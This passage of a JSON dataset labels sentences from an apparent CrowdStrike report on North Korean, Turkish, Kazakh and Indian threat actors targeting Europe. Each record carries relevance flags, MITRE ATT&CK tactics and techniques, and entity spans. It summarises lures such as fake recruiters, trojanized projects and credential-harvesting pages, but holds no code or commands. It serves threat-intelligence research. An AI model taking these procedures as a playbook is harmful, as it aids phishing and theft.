HTTPSpy malware.", "entities": [ { "text": "VELVET CHOLLIMA", "start": 46, "end": 61, "label": "ThreatActor" }, { "text": "targeted a German defense manufacturer’s employees via a credential phishing campaign deploying their HTTPSpy malware", "start": 69, "end": 186, "label": "Action" }, { "text": "HTTPSpy malware", "start": 171, "end": 186, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s276-49da9c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 276, "context_before": "Between May 2024 and at least September 2024, VELVET CHOLLIMA likely targeted a German defense manufacturer’s employees via a credential phishing campaign deploying their HTTPSpy malware.", "sentence_text": "Targeting defense manufacturing entities to collect intellectual property or military intelligence aligns with VELVET CHOLLIMA’s known target scope and motivations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s277-6394c9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 277, "context_before": "Targeting defense manufacturing entities to collect intellectual property or military intelligence aligns with VELVET CHOLLIMA’s known target scope and motivations.", "sentence_text": "In August 2024, LABYRINTH CHOLLIMA posed as a job recruiter to entice an employee at a European defense entity into downloading a malicious job-themed ZIP file hosted on a cloud file sharing service.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Pose as a job recruiter to entice an employee to download a malicious ZIP file hosted on a cloud file sharing service.", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 16, "end": 34, "label": "ThreatActor" }, { "text": "posed as a job recruiter to entice an employee at a European defense entity into downloading a malicious job-themed ZIP file hosted on a cloud file sharing service", "start": 35, "end": 198, "label": "Action" }, { "text": "malicious job-themed ZIP file", "start": 130, "end": 159, "label": "MalwareTool" }, { "text": "cloud file sharing service", "start": 172, "end": 198, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s278-2ff329", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 278, "context_before": "In August 2024, LABYRINTH CHOLLIMA posed as a job recruiter to entice an employee at a European defense entity into downloading a malicious job-themed ZIP file hosted on a cloud file sharing service.", "sentence_text": "This defense entity — which works in areas of high interest to the North Korean regime (e.g., satellites and aerial reconnaissance) — aligns with the DPRK’s intelligence requirements.24 Subsequently, in May 2025, the adversary targeted a European defense entity with an employment-themed ZIP file delivered via WhatsApp.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Target a European defense entity using an employment-themed ZIP file delivered via WhatsApp.", "entities": [ { "text": "targeted a European defense entity with an employment-themed ZIP file delivered via WhatsApp", "start": 227, "end": 319, "label": "Action" }, { "text": "employment-themed ZIP file", "start": 270, "end": 296, "label": "MalwareTool" }, { "text": "WhatsApp", "start": 311, "end": 319, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s279-f8023a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 279, "context_before": "This defense entity — which works in areas of high interest to the North Korean regime (e.g., satellites and aerial reconnaissance) — aligns with the DPRK’s intelligence requirements.24 Subsequently, in May 2025, the adversary targeted a European defense entity with an employment-themed ZIP file delivered via WhatsApp.", "sentence_text": "European Financial Services Targeting European financial institutions and financial technology (fintech) companies are high-value targets for financially motivated DPRK operations, as Europe contains many well-developed financial and fintech entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s280-d256c1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 280, "context_before": "European Financial Services Targeting European financial institutions and financial technology (fintech) companies are high-value targets for financially motivated DPRK operations, as Europe contains many well-developed financial and fintech entities.", "sentence_text": "Many European jurisdictions have also relaxed financial regulations, which could contribute to a perception of lower security levels or reluctance to report cybersecurity incidents.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s281-642f6e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 281, "context_before": "Many European jurisdictions have also relaxed financial regulations, which could contribute to a perception of lower security levels or reluctance to report cybersecurity incidents.", "sentence_text": "Both scenarios likely heighten DPRK-nexus adversaries’ interest in targeting these entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s282-49c00e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 282, "context_before": "Both scenarios likely heighten DPRK-nexus adversaries’ interest in targeting these entities.", "sentence_text": "In several incidents, the adversary leveraged video conference-themed phishing lures masquerading as venture capital opportunities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Leverage video conference-themed phishing lures masquerading as venture capital opportunities.", "entities": [ { "text": "leveraged video conference-themed phishing lures masquerading as venture capital opportunities", "start": 36, "end": 130, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s283-a20f62", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 283, "context_before": "In several incidents, the adversary leveraged video conference-themed phishing lures masquerading as venture capital opportunities.", "sentence_text": "These lures enticed targets to download and execute AppleScript payloads that purportedly correct meeting access or audio issues.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1059.002", "name": "Command and Scripting Interpreter: AppleScript" } ], "procedure": "Entice targets to download and execute AppleScript payloads.", "entities": [ { "text": "enticed targets to download and execute AppleScript payloads that purportedly correct meeting access or audio issues", "start": 12, "end": 128, "label": "Action" }, { "text": "AppleScript payloads", "start": 52, "end": 72, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s284-7d363c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 284, "context_before": "These lures enticed targets to download and execute AppleScript payloads that purportedly correct meeting access or audio issues.", "sentence_text": "STARDUST CHOLLIMA’s campaigns are very likely motivated by the DPRK's need for digital assets and to evade international sanctions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s285-a09500", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 285, "context_before": "STARDUST CHOLLIMA’s campaigns are very likely motivated by the DPRK's need for digital assets and to evade international sanctions.", "sentence_text": "In Q3 2024, LABYRINTH CHOLLIMA impersonated a job recruiter on LinkedIn to entice an employee at a Western Europe-based fintech company into joining a Slack workspace for the fake company.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Impersonate a recruiter on LinkedIn to lure a victim into joining a malicious Slack workspace.", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 12, "end": 30, "label": "ThreatActor" }, { "text": "impersonated a job recruiter on LinkedIn to entice an employee at a Western Europe-based fintech company into joining a Slack workspace for the fake company", "start": 31, "end": 187, "label": "Action" }, { "text": "LinkedIn", "start": 63, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "Slack workspace", "start": 151, "end": 166, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s286-62dbc7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 286, "context_before": "In Q3 2024, LABYRINTH CHOLLIMA impersonated a job recruiter on LinkedIn to entice an employee at a Western Europe-based fintech company into joining a Slack workspace for the fake company.", "sentence_text": "The victim downloaded a trojanized Python project containing SnakeBaker that masqueraded as a skills assessment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Victim downloaded a trojanized Python project containing SnakeBaker disguised as a skills assessment.", "entities": [ { "text": "downloaded a trojanized Python project containing SnakeBaker", "start": 11, "end": 71, "label": "Action" }, { "text": "SnakeBaker", "start": 61, "end": 71, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s287-a61352", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 287, "context_before": "The victim downloaded a trojanized Python project containing SnakeBaker that masqueraded as a skills assessment.", "sentence_text": "After the victim executed the project, LABYRINTH CHOLLIMA accessed the victim’s cloud environment access key, conducted reconnaissance, moved laterally, and ultimately diverted cryptocurrency funds.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Access the victim’s cloud environment access key, conduct reconnaissance, move laterally, and divert cryptocurrency funds.", "entities": [ { "text": "accessed the victim’s cloud environment access key", "start": 58, "end": 108, "label": "Action" }, { "text": "conducted reconnaissance", "start": 110, "end": 134, "label": "Action" }, { "text": "moved laterally", "start": 136, "end": 151, "label": "Action" }, { "text": "diverted cryptocurrency funds", "start": 168, "end": 197, "label": "Action" }, { "text": "victim’s cloud environment", "start": 71, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p38-s288-72babf", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 38, "sentence_id": 288, "context_before": "After the victim executed the project, LABYRINTH CHOLLIMA accessed the victim’s cloud environment access key, conducted reconnaissance, moved laterally, and ultimately diverted cryptocurrency funds.", "sentence_text": "24 https://kcnawatch.org/newstream/1610155111-665078257/on-report-made-by-supreme-leader-kim-jong-un-at-\n8th-congress-of-wpk/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s289-625ce7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 289, "context_before": "24 https://kcnawatch.org/newstream/1610155111-665078257/on-report-made-by-supreme-leader-kim-jong-un-at-8th-congress-of-wpk/", "sentence_text": "European Energy Sector Targeting Between April 2024 and October 2024, VELVET CHOLLIMA spoofed U.K. energy entities and numerous organizations in the U.S. and Japan.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Spoof U.K. energy entities and organizations in the U.S. and Japan.", "entities": [ { "text": "spoofed U.K. energy entities and numerous organizations in the U.S. and Japan", "start": 86, "end": 163, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s290-1fb53c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 290, "context_before": "European Energy Sector Targeting Between April 2024 and October 2024, VELVET CHOLLIMA spoofed U.K. energy entities and numerous organizations in the U.S. and Japan.", "sentence_text": "Whether VELVET CHOLLIMA was specifically targeting the energy sector — or whether they were attempting to compromise an individual accessing public-facing energy websites — remains unclear.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s291-21bdac", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 291, "context_before": "Whether VELVET CHOLLIMA was specifically targeting the energy sector — or whether they were attempting to compromise an individual accessing public-facing energy websites — remains unclear.", "sentence_text": "If the former, the collected data could support the DPRK’s likely long-standing intelligence requirements on energy technology.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s292-ae9a9f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 292, "context_before": "If the former, the collected data could support the DPRK’s likely long-standing intelligence requirements on energy technology.", "sentence_text": "However, this activity is an anomaly for VELVET CHOLLIMA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s293-ba9da6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 293, "context_before": "However, this activity is an anomaly for VELVET CHOLLIMA.", "sentence_text": "DPRK adversaries do not currently pose a significant threat to European energy companies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s294-4e6f55", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 294, "context_before": "DPRK adversaries do not currently pose a significant threat to European energy companies.", "sentence_text": "European Professional Services Sector Targeting Also during the April 2024 to October 2024 campaign, VELVET CHOLLIMA targeted U.K. professional services entities using spoofed domains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s295-cab4df", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 295, "context_before": "European Professional Services Sector Targeting Also during the April 2024 to October 2024 campaign, VELVET CHOLLIMA targeted U.K. professional services entities using spoofed domains.", "sentence_text": "This activity likely supports the adversary’s broader intelligence collection objectives regarding Western policy positions and accessing entities that influence diplomatic and economic decision-making processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s296-8a99a9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 296, "context_before": "This activity likely supports the adversary’s broader intelligence collection objectives regarding Western policy positions and accessing entities that influence diplomatic and economic decision-making processes.", "sentence_text": "FAMOUS CHOLLIMA\nDuring the reporting period, FAMOUS CHOLLIMA used malware and insider threats to target Europe-based entities in opportunistic and sector-agnostic activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s297-03b8e0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 297, "context_before": "FAMOUS CHOLLIMA\nDuring the reporting period, FAMOUS CHOLLIMA used malware and insider threats to target Europe-based entities in opportunistic and sector-agnostic activity.", "sentence_text": "FAMOUS CHOLLIMA’s operations appear to be financially motivated, as their activity consistently involves small-value cryptocurrency theft or credit card fraud as well as receiving illicit salaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s298-1c5de6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 298, "context_before": "FAMOUS CHOLLIMA’s operations appear to be financially motivated, as their activity consistently involves small-value cryptocurrency theft or credit card fraud as well as receiving illicit salaries.", "sentence_text": "FAMOUS CHOLLIMA uses employment-themed lures to entice targets into downloading and executing malicious payloads hosted on GitHub and Bitbucket.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use employment-themed lures to entice targets into downloading and executing malicious payloads hosted on GitHub and Bitbucket.", "entities": [ { "text": "uses employment-themed lures to entice targets into downloading and executing malicious payloads hosted on GitHub and Bitbucket", "start": 16, "end": 143, "label": "Action" }, { "text": "GitHub", "start": 123, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "Bitbucket", "start": 134, "end": 143, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s299-547547", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 299, "context_before": "FAMOUS CHOLLIMA uses employment-themed lures to entice targets into downloading and executing malicious payloads hosted on GitHub and Bitbucket.", "sentence_text": "The adversary also lures targets into visiting malicious infrastructure that masquerades as virtual interviewing or skills assessment platforms.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Lure targets into visiting malicious infrastructure disguised as virtual interviewing or skills assessment platforms.", "entities": [ { "text": "lures targets into visiting malicious infrastructure", "start": 19, "end": 71, "label": "Action" }, { "text": "malicious infrastructure", "start": 47, "end": 71, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s300-e5dd5d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 300, "context_before": "The adversary also lures targets into visiting malicious infrastructure that masquerades as virtual interviewing or skills assessment platforms.", "sentence_text": "European individuals have also helped facilitate FAMOUS CHOLLIMA’s insider threat operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s301-461884", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 301, "context_before": "European individuals have also helped facilitate FAMOUS CHOLLIMA’s insider threat operations.", "sentence_text": "Additionally, CrowdStrike Intelligence identified a Poland-based laptop farm that the adversary used in June 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p39-s302-248ad9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 39, "sentence_id": 302, "context_before": "Additionally, CrowdStrike Intelligence identified a Poland-based laptop farm that the adversary used in June 2025.", "sentence_text": "The U.S. DOJ has also sanctioned a Russian national for working with a Russia-based DPRK consular official to facilitate payments to an entity employing DPRK IT workers in Russia and Laos.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p40-s303-e57e53", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 40, "sentence_id": 303, "context_before": "The U.S. DOJ has also sanctioned a Russian national for working with a Russia-based DPRK consular official to facilitate payments to an entity employing DPRK IT workers in Russia and Laos.", "sentence_text": "REST-OF-WORLD ACTIVITY\nBetween January 2024 and September 2025, CrowdStrike Intelligence observed few instances of rest-of-world (ROW)\nadversaries targeting European entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p40-s304-e2f43f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 40, "sentence_id": 304, "context_before": "REST-OF-WORLD ACTIVITY\nBetween January 2024 and September 2025, CrowdStrike Intelligence observed few instances of rest-of-world (ROW)\nadversaries targeting European entities.", "sentence_text": "In December 2023, COSMIC WOLF deployed the Torchlight Linux implant and used living-off-the-land techniques at a Europe-based technology company.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deploy the Torchlight Linux implant and use living-off-the-land techniques at a Europe-based technology company.", "entities": [ { "text": "deployed the Torchlight Linux implant", "start": 30, "end": 67, "label": "Action" }, { "text": "used living-off-the-land techniques at a Europe-based technology company", "start": 72, "end": 144, "label": "Action" }, { "text": "Torchlight Linux implant", "start": 43, "end": 67, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p40-s305-c798b3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 40, "sentence_id": 305, "context_before": "In December 2023, COSMIC WOLF deployed the Torchlight Linux implant and used living-off-the-land techniques at a Europe-based technology company.", "sentence_text": "Though the adversary’s initial access method is unknown, CrowdStrike Intelligence research indicates they obtained a private SSH key for a server in the target environment.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "Obtain a private SSH key for a server in the target environment.", "entities": [ { "text": "obtained a private SSH key for a server in the target environment", "start": 106, "end": 171, "label": "Action" }, { "text": "server in the target environment", "start": 139, "end": 171, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p40-s306-76c5ad", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 40, "sentence_id": 306, "context_before": "Though the adversary’s initial access method is unknown, CrowdStrike Intelligence research indicates they obtained a private SSH key for a server in the target environment.", "sentence_text": "Based on COSMIC WOLF’s activity since 2022, the adversary likely focuses on European telecom and technology entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p40-s307-b9786f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 40, "sentence_id": 307, "context_before": "Based on COSMIC WOLF’s activity since 2022, the adversary likely focuses on European telecom and technology entities.", "sentence_text": "Compromising these entities likely enables COSMIC WOLF to target downstream entities more directly relevant to Türkiye’s intelligence requirements, such as minority groups and political dissidents in Türkiye.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s308-08053e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 308, "context_before": "Compromising these entities likely enables COSMIC WOLF to target downstream entities more directly relevant to Türkiye’s intelligence requirements, such as minority groups and political dissidents in Türkiye.", "sentence_text": "Kazakhstan-Nexus Adversaries\nKazakhstan-nexus adversary COMRADE SAIGA has not been observed targeting European entities between January 2024 and September 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s309-ad31fb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 309, "context_before": "Kazakhstan-Nexus Adversaries\nKazakhstan-nexus adversary COMRADE SAIGA has not been observed targeting European entities between January 2024 and September 2025.", "sentence_text": "Outside of Russia, COMRADE SAIGA predominantly targets government and energy entities associated with or operating in the CIS region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s310-f829a3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 310, "context_before": "Outside of Russia, COMRADE SAIGA predominantly targets government and energy entities associated with or operating in the CIS region.", "sentence_text": "In late January 2023, COMRADE SAIGA likely targeted a European embassy in Astana, Kazakhstan, using a phishing email containing a malicious attachment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Target a European embassy using a phishing email containing a malicious attachment.", "entities": [ { "text": "targeted a European embassy in Astana, Kazakhstan, using a phishing email containing a malicious attachment", "start": 43, "end": 150, "label": "Action" }, { "text": "phishing email", "start": 102, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "malicious attachment", "start": 130, "end": 150, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s311-ce4543", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 311, "context_before": "In late January 2023, COMRADE SAIGA likely targeted a European embassy in Astana, Kazakhstan, using a phishing email containing a malicious attachment.", "sentence_text": "The adversary’s focus on MFAs — which has not been observed against European entities since 2023 — highly likely indicates that COMRADE SAIGA aims to collect intelligence regarding Kazakhstan’s diplomatic efforts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s312-83273d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 312, "context_before": "The adversary’s focus on MFAs — which has not been observed against European entities since 2023 — highly likely indicates that COMRADE SAIGA aims to collect intelligence regarding Kazakhstan’s diplomatic efforts.", "sentence_text": "India-Nexus Adversaries\nFrom January 2024 to September 2025, India-nexus adversaries only conducted one incident targeting European entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s313-d76808", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 313, "context_before": "India-Nexus Adversaries\nFrom January 2024 to September 2025, India-nexus adversaries only conducted one incident targeting European entities.", "sentence_text": "In November 2024, HAZY TIGER targeted diplomatic entities in China — including representatives from a European trade mission — likely using spear-phishing emails with search connector files linked to malicious WebDAV directories.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Target diplomatic entities using spear-phishing emails with search connector files linked to malicious WebDAV directories.", "entities": [ { "text": "targeted diplomatic entities in China — including representatives from a European trade mission — likely using spear-phishing emails with search connector files linked to malicious WebDAV directories", "start": 29, "end": 228, "label": "Action" }, { "text": "malicious WebDAV directories", "start": 200, "end": 228, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s314-c74cfa", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 314, "context_before": "In November 2024, HAZY TIGER targeted diplomatic entities in China — including representatives from a European trade mission — likely using spear-phishing emails with search connector files linked to malicious WebDAV directories.", "sentence_text": "HAZY TIGER was likely continuing their intelligence collection efforts regarding Chinese diplomatic relations rather than specifically targeting the trade mission.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s315-67f1b4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 315, "context_before": "HAZY TIGER was likely continuing their intelligence collection efforts regarding Chinese diplomatic relations rather than specifically targeting the trade mission.", "sentence_text": "In late 2023, FABLE TIGER likely targeted a Serbian government entity using a credential harvesting website spoofing the organization’s webmail login page.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Target a Serbian government entity using a credential harvesting website spoofing the organization’s webmail login page.", "entities": [ { "text": "targeted a Serbian government entity using a credential harvesting website spoofing the organization’s webmail login page", "start": 33, "end": 154, "label": "Action" }, { "text": "credential harvesting website", "start": 78, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s316-05217e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 316, "context_before": "In late 2023, FABLE TIGER likely targeted a Serbian government entity using a credential harvesting website spoofing the organization’s webmail login page.", "sentence_text": "FABLE TIGER typically targets South Asian entities, and CrowdStrike Intelligence cannot currently assess the adversary’s motivation for this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s317-9b42a3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 317, "context_before": "FABLE TIGER typically targets South Asian entities, and CrowdStrike Intelligence cannot currently assess the adversary’s motivation for this activity.", "sentence_text": "India-nexus activity against the region will highly likely remain infrequent or tangential over the next year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s318-45b70e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 318, "context_before": "India-nexus activity against the region will highly likely remain infrequent or tangential over the next year.", "sentence_text": "This assessment is made with high confidence based on India-nexus adversaries’ predominant focus on South and Southeast Asian targets, with minimal activity against European entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s319-d9c603", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 319, "context_before": "This assessment is made with high confidence based on India-nexus adversaries’ predominant focus on South and Southeast Asian targets, with minimal activity against European entities.", "sentence_text": "Hacktivism and\nNon-State Overview\nBetween January 2024 and September 2025, CrowdStrike Intelligence observed numerous hacktivist groups claiming to target industrial control systems (ICSs) across Europe both in response to conflicts and in non-conflict-related activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s320-a63cd9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 320, "context_before": "Hacktivism and\nNon-State Overview\nBetween January 2024 and September 2025, CrowdStrike Intelligence observed numerous hacktivist groups claiming to target industrial control systems (ICSs) across Europe both in response to conflicts and in non-conflict-related activity.", "sentence_text": "Pro-Russia hacktivist group Z-Alliance conducted most of this activity against countries perceived to be hostile toward Russia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s321-27c0f3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 321, "context_before": "Pro-Russia hacktivist group Z-Alliance conducted most of this activity against countries perceived to be hostile toward Russia.", "sentence_text": "Hacktivists’ growing interest in targeting ICSs is likely due to the potential significant impact and the associated media attention.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p41-s322-1128eb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 41, "sentence_id": 322, "context_before": "Hacktivists’ growing interest in targeting ICSs is likely due to the potential significant impact and the associated media attention.", "sentence_text": "During this reporting period, international law enforcement — including European authorities — disrupted multiple 